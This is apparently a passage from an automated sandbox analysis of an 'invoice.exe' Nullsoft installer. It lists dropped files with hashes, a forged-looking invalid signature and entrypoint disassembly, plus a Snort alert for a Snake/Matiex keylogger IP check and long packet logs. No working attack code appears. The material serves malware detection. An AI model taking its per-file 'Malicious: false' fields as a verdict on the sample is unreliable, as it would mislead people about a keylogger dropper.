Preview:	.;!@Lang2@!UTF-8!..; 4.30 : Milan Hrub...; 4.33 : Michal Molhanec..; 9.07 : Ji.. Mal.k..; 15.00 : Kry.tof .ern...;..;..;..;..;..;..;..0..7-Zip..Czech...e.tina..401..OK..Storno........&Ano..&Ne..Zav..&t..N.pov.da....Po&kra.ovat..440..Ano na &v.echno..N&e na v.echno..Zastavit..Spustit znovu..&Pozad...P&op.ed...Po&zastavit..Pozastaveno..Jste si jist., .e to chcete stornovat?..500..&Soubor...pr&avy..&Zobrazen...&Obl.ben...&N.stroje..N.po&v.da..540..&Otev..t..Otev..t u&vnit...Otev..t &mimo..&Zobrazit..&Upravit..&P.ejmenovat..Kop.rovat &do.....P.&esunout do.....Vymaza&t..&Rozd.lit soubor.....&Slou.it soubory.....Vlast&nosti..Pozn.mk&a..Vypo..tat kontroln. sou.et..Porovnat soubory..Vytvo.it slo.ku..Vytvo.it soubor..&Konec..Odk.zat..&Alternate Streams..600..Vybrat &v.e..Zru.it v.b.r v.e..&Invertovat v.b.r..Vybrat.....Zru.it v.b.r.....Vybrat podle typu..Zru.it v.b.r podle typu..700..&Velk. ikony..&Mal. ikony..&Seznam..&Podrobn

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\figuranternes.Han

Download File

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	data
Category:	dropped
Size (bytes):	218305
Entropy (8bit):	7.337101777894853
Encrypted:	false
SSDEEP:	3072:PdqWTzg/gzZ9xRpRmib28JUBTE+vAsGolsJAsJ7Z/aKespGgyfZrl:HOaZ1nv9J2I+veZiKe2i
MD5:	DF0C864AD6FE636F3AD391B04A408AC7
SHA1:	B0072D5406BA66EDD9F6A1A443D56378BDA688C5
SHA-256:	A802EB02B9345615A947C6B8B57441D7DEBD4300FFEAFC16623CE18F68CABBF2
SHA-512:	2AA97CC2724CA1309B3594F552BAF227CCB7B6F73B29E612A9779D987E9FBE0E41F7CE765083AE16CD3CEC84B826A401279D69200D1AE3A0722B4E3CC731079C
Malicious:	false
Preview:	........kkk..........***...u............................\|.......................44...e............ .DD..TTT.................""...............................UU...[[[......<<.........qq.........l...................1........4........f.............................(......{{.................1......q....66...........:.........................mmm.........55.'...........................111...99.x.LLLLL..........................~................""...))...........#..............@@.b.........4.0....&............\|........................\|\|.................................ppp.8.......ww............W..&...*........````.......~.....................O.,,............C...............................F.....\.........HHHHHHH......o.....^^...d...................ff..... ..D.......I.....W.......................................\...............y..F....ppp..r......................))...........".........................o..........9.22.........~~~.QQQ......C.........................6......~~...................

C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\AdvSplash.dll

Download File

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	4.76010720109437
Encrypted:	false
SSDEEP:	96:HqNXqwK188CgAtXvZBkjDf0yf9ysrtWp2wol:HAqrg1XvZB6kYtWp2
MD5:	88C3BA1802AEF228541820767453E058
SHA1:	4F3AEFB9E4EC27CB49973CB19BD968E54A2BA676
SHA-256:	2722555EC1F72523774B64D25FD4C2B460000BFE82140876D6100DC4FB1F62B1
SHA-512:	718790339E13B53553AFDE6968AE10CDA7B47CBDBFC82599116C8B5B1E8FBBA259F0CE6781908BE027360132A0ABE057DF2FFA7072212ACDA96BFF535E241582
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+.Y.o.7Eo.7Eo.7Eo.6EF.7E..jEf.7E;..Em.7E..3En.7ERicho.7E........PE..L.....uY...........!................`........ ...............................P......................................P$..E.... ..d............................@..$.................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.767999234165119
Encrypted:	false
SSDEEP:	192:cPtkumJX7zBE2kGwfy9S9VkPsFQ1MZ1c:N7O2k5q9wA1MZa
MD5:	C9473CB90D79A374B2BA6040CA16E45C
SHA1:	AB95B54F12796DCE57210D65F05124A6ED81234A
SHA-256:	B80A5CBA69D1853ED5979B0CA0352437BF368A5CFB86CB4528EDADD410E11352
SHA-512:	EAFE7D5894622BC21F663BCA4DD594392EE0F5B29270B6B56B0187093D6A3A103545464FF6398AD32D2CF15DAB79B1F133218BA9BA337DDC01330B5ADA804D7B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....uY...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..^....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	2097152
Entropy (8bit):	4.523815600656336
Encrypted:	false
SSDEEP:	12288:kDvK0ehODuTywB84iTd+vXlnebS23+5PfWhsYSDzFJFGl56zwlMhagmcnYJx:kATywB84iTd+vXlneGKHlMhagmcnYJx
MD5:	6B3E54A24A9E83963E044BE36E344CD6
SHA1:	FE8383F68D875A4C9E711E7878D7385C1612CCCA
SHA-256:	D3FF0F24C8D20A5005CC564DEB0B197A5FBF1506F3F1388D50292DD118698312
SHA-512:	BD8821C4DE2619E9450DE73A4FAA53B13D6102CB1686DFABBB72D01B12AE96FC8918D01FD366ACC3EC139DD22DAFBDFDE98D418677656469776B9C992C4D8904
Malicious:	false
Preview:	regf........5.#.^................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm..c..X...............................................................................................................................................................................................................................................................................................................................................l..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	499712
Entropy (8bit):	4.5534365820054905
Encrypted:	false
SSDEEP:	3072:HAQEODdececetnZJCy5i1T7Em0CXrnS+p2oJHrYKzOixxRvF5dlEVyi9RReloD3I:0OJJxa5ii+4yLYKzX1F/ljiteloN5
MD5:	51B02C650B9F903CC6EEACB3A10D21A5
SHA1:	4EA07D7465F2429B16A13D2058F8A4B25CC65AE4
SHA-256:	30B4E3705D8FAC7230A89C328F433F7EEC2FA552181EE91AB39F4B13A7ED70ED
SHA-512:	7624DD241AC2E1448014E5B603C9FDD255180E437E1A34520D8115C3B56052D24DC7FD98C4ED929D6722F71CCF1F2FC978C3344F7FABEADEA4F490B78D7B137F
Malicious:	false
Preview:	regf........5.#.^................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm..c..X...............................................................................................................................................................................................................................................................................................................................................l..HvLE....................3.aS.l....)!..z..........................`............... ...@..hbin................5.#.^...........nk,....S...............................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk ...X..X......(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...................................Z.......................Root........lh..(.....A.

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	164
Entropy (8bit):	4.5750027080925975
Encrypted:	false
SSDEEP:	3:WNEDkFrA7fw3eqIusdHSdX7/fWmEdIOAlwV6EwqQLWFBaaafFa/Rv/naaaaqBcn:WsTbtyxkKO+dZWF7afFoRHRaaqBc
MD5:	8D14AB4128F9BFE3E4F5F9B160BBFFE7
SHA1:	7EA846DF04D4120A819DB47723C716BF2610E5CD
SHA-256:	91D7EA682DB129FD33DA04168DB3BFCA08EA8B6CB0533C559E0ADC0DA5BD56E8
SHA-512:	BF72FC0F59202B09E92961CE6C6CF21D3BBBB22AAA6B0A6B3FFBA2392362BF30A6B874A6CBBF6D11F06975CDDDBDB247053222D34D4F24055E50C0AFC9802E65
Malicious:	false
Preview:	.Unhandled Exception: System.Runtime.InteropServices.SEHException: External component has thrown an exception... at ????_.?;???.?????().. at ?????.?@???.Main().

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.953363965326294
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	invoice.exe
File size:	861416
MD5:	f111934675c34cca18d9d76fc34a2e40
SHA1:	6c54e0fbae03df56fee84195f3deb4d2ebd8d8c1
SHA256:	c627b8bb6c4ea0cf03aa2d209d0ecc53ff9784283328dabd44c1675aef0939c2
SHA512:	48b825550b320ebfcccc4260e359ffedad7675913ee7e7a62bd62a3839fd20c8f7cafb9a6e6bb8d7d8a2164674019b696c8851362c0a6b69f4dde8b1da3dc84c
SSDEEP:	12288:cJAEzBf4FZZmubGJ6vVZgj9Zp4RVkdXALai8ZpP7MxhGmeLJfRriFm4gCb5vr:cJBf4guba6voj9mOdXALN8bP7MxhVP5
TLSH:	090523919D24D01ACFCB1A32C6E0AAF51FA93D1DF546350FAB103DDE7AB3016992E1D8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...2.uY.................d...\|.....

File Icon


Icon Hash:	185d7c3f1d094720

Static PE Info

General

Entrypoint:	0x4031f1
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x59759532 [Mon Jul 24 06:35:30 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3abe302b6d9a1256e6a915429af4ffd2

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Levnendes@Printstnings.Gum, OU="Berlinsk Absorptively Uncatholicise ", O=Toffy, L=Parbrook, S=England, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	04/05/2022 00:03:57 03/05/2025 00:03:57
Subject Chain	E=Levnendes@Printstnings.Gum, OU="Berlinsk Absorptively Uncatholicise ", O=Toffy, L=Parbrook, S=England, C=GB
Version:	3
Thumbprint MD5:	56C9BA7DFEC92471D18B65DEBADFD264
Thumbprint SHA-1:	791103B8F445F30749CC09454489D8932043151F
Thumbprint SHA-256:	12660D9C667AA56EF5F4D3C7A46C00BBF32786E1EDB7C6D1BB2EFDC10DDE5337
Serial:	292387F23D7D31A4C4A61C828EB508755809B6A4

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080A0h]
call dword ptr [0040809Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F40Ch], eax
je 00007FEA50837CA3h
push ebx
call 00007FEA5083AD5Ah
cmp eax, ebx
je 00007FEA50837C99h
push 00000C00h
call eax
mov esi, 00408298h
push esi
call 00007FEA5083ACD6h
push esi
call dword ptr [00408098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FEA50837C7Dh
push 0000000Ah
call 00007FEA5083AD2Eh
push 00000008h
call 00007FEA5083AD27h
push 00000006h
mov dword ptr [0042F404h], eax
call 00007FEA5083AD1Bh
cmp eax, ebx
je 00007FEA50837CA1h
push 0000001Eh
call eax
test eax, eax
je 00007FEA50837C99h
or byte ptr [0042F40Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429830h
call dword ptr [00408178h]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8534	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x41000	0x219c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd02c0	0x2228
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6254	0x6400	False	0.6676171875	data	6.4338643172916266	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1354	0x1400	False	0.4599609375	data	5.236269898436511	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25518	0x600	False	0.4557291666666667	data	4.044625496015545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x30000	0x11000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x41000	0x219c8	0x21a00	False	0.8901312732342007	data	7.609648735329348	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x41418	0x1224f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x53668	0x6259	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States
RT_ICON	0x598c8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x5be70	0x2466	PNG image data, 256 x 256, 4-bit colormap, non-interlaced	English	United States
RT_ICON	0x5e2d8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x5f380	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304	English	United States
RT_ICON	0x60228	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024	English	United States
RT_ICON	0x60ad0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States
RT_ICON	0x61138	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256	English	United States
RT_ICON	0x616a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_ICON	0x61b08	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States
RT_ICON	0x61df0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States
RT_DIALOG	0x61f18	0x120	data	English	United States
RT_DIALOG	0x62038	0x11c	data	English	United States
RT_DIALOG	0x62158	0xc4	data	English	United States
RT_DIALOG	0x62220	0x60	data	English	United States
RT_GROUP_ICON	0x62280	0xae	data	English	United States
RT_VERSION	0x62330	0x354	data	English	United States
RT_MANIFEST	0x62688	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20193.122.130.049842802039190 03/17/23-14:34:28.679795	TCP	2039190	ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check	49842	80	192.168.11.20	193.122.130.0

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2023 14:34:25.817516088 CET	49840	443	192.168.11.20	142.250.184.206
Mar 17, 2023 14:34:25.817559958 CET	443	49840	142.250.184.206	192.168.11.20
Mar 17, 2023 14:34:25.817728996 CET	49840	443	192.168.11.20	142.250.184.206
Mar 17, 2023 14:34:25.830518007 CET	49840	443	192.168.11.20	142.250.184.206
Mar 17, 2023 14:34:25.830559969 CET	443	49840	142.250.184.206	192.168.11.20
Mar 17, 2023 14:34:25.870882988 CET	443	49840	142.250.184.206	192.168.11.20
Mar 17, 2023 14:34:25.871021986 CET	49840	443	192.168.11.20	142.250.184.206
Mar 17, 2023 14:34:25.871067047 CET	49840	443	192.168.11.20	142.250.184.206
Mar 17, 2023 14:34:25.872196913 CET	443	49840	142.250.184.206	192.168.11.20
Mar 17, 2023 14:34:25.872360945 CET	49840	443	192.168.11.20	142.250.184.206
Mar 17, 2023 14:34:25.945143938 CET	49840	443	192.168.11.20	142.250.184.206
Mar 17, 2023 14:34:25.945188046 CET	443	49840	142.250.184.206	192.168.11.20
Mar 17, 2023 14:34:25.945667982 CET	443	49840	142.250.184.206	192.168.11.20
Mar 17, 2023 14:34:25.945909977 CET	49840	443	192.168.11.20	142.250.184.206
Mar 17, 2023 14:34:25.950752974 CET	49840	443	192.168.11.20	142.250.184.206
Mar 17, 2023 14:34:25.992337942 CET	443	49840	142.250.184.206	192.168.11.20
Mar 17, 2023 14:34:26.441880941 CET	443	49840	142.250.184.206	192.168.11.20
Mar 17, 2023 14:34:26.442033052 CET	49840	443	192.168.11.20	142.250.184.206
Mar 17, 2023 14:34:26.442121029 CET	49840	443	192.168.11.20	142.250.184.206
Mar 17, 2023 14:34:26.442156076 CET	443	49840	142.250.184.206	192.168.11.20
Mar 17, 2023 14:34:26.442212105 CET	443	49840	142.250.184.206	192.168.11.20
Mar 17, 2023 14:34:26.442816973 CET	49840	443	192.168.11.20	142.250.184.206
Mar 17, 2023 14:34:26.442816973 CET	49840	443	192.168.11.20	142.250.184.206
Mar 17, 2023 14:34:26.527911901 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:26.527951002 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:26.528120041 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:26.528405905 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:26.528420925 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.586244106 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.586421967 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.586488962 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.588453054 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.588624954 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.588624954 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.591826916 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.591856003 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.592645884 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.592905045 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.593214989 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.636318922 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.803666115 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.803952932 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.803965092 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.804122925 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.804511070 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.804641008 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.804688931 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.804688931 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.805387974 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.805522919 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.805593967 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.806293011 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.806519032 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.806525946 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.806628942 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.808926105 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.809103012 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.809113979 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.809334040 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.811726093 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.811872959 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.811928988 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.811933041 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.811959982 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.812011957 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.812182903 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.812731028 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.812877893 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.812890053 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.813030958 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.813043118 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.813240051 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.813616991 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.813657999 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.813822031 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.813828945 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.813977003 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.814548969 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.814713001 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.814724922 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.814933062 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.815463066 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.815520048 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.815613985 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.815628052 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.815685034 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.815767050 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.816344023 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.816478968 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.816622019 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.816634893 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.816757917 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.817270041 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.817449093 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.817460060 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.817699909 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.817708015 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.817888021 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.818191051 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.818242073 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.818332911 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.818346024 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.818413019 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.818538904 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.819063902 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.819194078 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.819221973 CET	49841	443	192.168.11.20	142.250.186.33
